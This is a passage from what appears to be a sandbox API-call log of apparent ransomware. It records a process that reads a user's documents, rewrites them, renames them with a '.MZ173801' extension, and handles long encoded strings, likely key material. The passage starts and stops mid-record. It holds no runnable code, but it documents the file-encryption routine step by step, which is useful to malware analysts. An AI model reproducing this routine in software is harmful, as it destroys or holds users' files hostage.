hTemplateFile=0x0) returned 0x408 [0122.371] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.371] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.371] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xa715 [0122.371] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.371] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xa715, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0xa715, lpOverlapped=0x0) returned 1 [0122.372] CloseHandle (hObject=0x408) returned 1 [0122.373] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\fYWa4.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\fywa4.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.374] WriteFile (in: hFile=0x408, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xa715, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f424*=0xa715, lpOverlapped=0x0) returned 1 [0122.376] CloseHandle (hObject=0x408) returned 1 [0122.376] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\fYWa4.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\fywa4.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\fYWa4.pdf.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\fywa4.pdf.mz173801")) returned 1 [0122.376] GetCurrentThreadId () returned 0x1358 [0122.376] GetCurrentThreadId () returned 0x1358 [0122.376] GetCurrentThreadId () returned 0x1358 [0122.377] GetCurrentThreadId () returned 0x1358 [0122.377] GetCurrentThreadId () returned 0x1358 [0122.377] GetCurrentThreadId () returned 0x1358 [0122.377] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd47c1270, ftCreationTime.dwHighDateTime=0x1d5e236, ftLastAccessTime.dwLowDateTime=0x100349e0, ftLastAccessTime.dwHighDateTime=0x1d5f0dc, ftLastWriteTime.dwLowDateTime=0x100349e0, ftLastWriteTime.dwHighDateTime=0x1d5f0dc, nFileSizeHigh=0x0, nFileSizeLow=0x1254c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="m8z Dy6SjgFjsVAZC.pps", cAlternateFileName="M8ZDY6~1.PPS")) returned 1 [0122.377] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.377] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\m8z Dy6SjgFjsVAZC.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\m8z dy6sjgfjsvazc.pps"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd47c1270, ftCreationTime.dwHighDateTime=0x1d5e236, ftLastAccessTime.dwLowDateTime=0x100349e0, ftLastAccessTime.dwHighDateTime=0x1d5f0dc, ftLastWriteTime.dwLowDateTime=0x100349e0, ftLastWriteTime.dwHighDateTime=0x1d5f0dc, nFileSizeHigh=0x0, nFileSizeLow=0x1254c)) returned 1 [0122.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.377] GetCurrentThreadId () returned 0x1358 [0122.377] GetCurrentThreadId () returned 0x1358 [0122.378] GetCurrentThreadId () returned 0x1358 [0122.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.378] GetCurrentThreadId () returned 0x1358 [0122.378] GetCurrentThreadId () returned 0x1358 [0122.378] GetCurrentThreadId () returned 0x1358 [0122.378] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\m8z Dy6SjgFjsVAZC.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\m8z dy6sjgfjsvazc.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.378] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.378] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.379] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x1254c [0122.379] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.379] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1254c, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x1254c, lpOverlapped=0x0) returned 1 [0122.380] CloseHandle (hObject=0x408) returned 1 [0122.381] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\m8z Dy6SjgFjsVAZC.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\m8z dy6sjgfjsvazc.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.382] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x1254c, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x1254c, lpOverlapped=0x0) returned 1 [0122.384] CloseHandle (hObject=0x408) returned 1 [0122.384] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\m8z Dy6SjgFjsVAZC.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\m8z dy6sjgfjsvazc.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\m8z Dy6SjgFjsVAZC.pps.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\m8z dy6sjgfjsvazc.pps.mz173801")) returned 1 [0122.385] GetCurrentThreadId () returned 0x1358 [0122.385] GetCurrentThreadId () returned 0x1358 [0122.385] GetCurrentThreadId () returned 0x1358 [0122.385] GetCurrentThreadId () returned 0x1358 [0122.385] GetCurrentThreadId () returned 0x1358 [0122.385] GetCurrentThreadId () returned 0x1358 [0122.385] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ff165b0, ftCreationTime.dwHighDateTime=0x1d5e4c5, ftLastAccessTime.dwLowDateTime=0x2860e060, ftLastAccessTime.dwHighDateTime=0x1d5e33f, ftLastWriteTime.dwLowDateTime=0x2860e060, ftLastWriteTime.dwHighDateTime=0x1d5e33f, nFileSizeHigh=0x0, nFileSizeLow=0x1800d, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="MkfvC5YVoY.csv", cAlternateFileName="MKFVC5~1.CSV")) returned 1 [0122.385] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.385] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.385] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\MkfvC5YVoY.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\mkfvc5yvoy.csv"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ff165b0, ftCreationTime.dwHighDateTime=0x1d5e4c5, ftLastAccessTime.dwLowDateTime=0x2860e060, ftLastAccessTime.dwHighDateTime=0x1d5e33f, ftLastWriteTime.dwLowDateTime=0x2860e060, ftLastWriteTime.dwHighDateTime=0x1d5e33f, nFileSizeHigh=0x0, nFileSizeLow=0x1800d)) returned 1 [0122.386] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.386] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.386] GetCurrentThreadId () returned 0x1358 [0122.386] GetCurrentThreadId () returned 0x1358 [0122.386] GetCurrentThreadId () returned 0x1358 [0122.386] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.386] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxN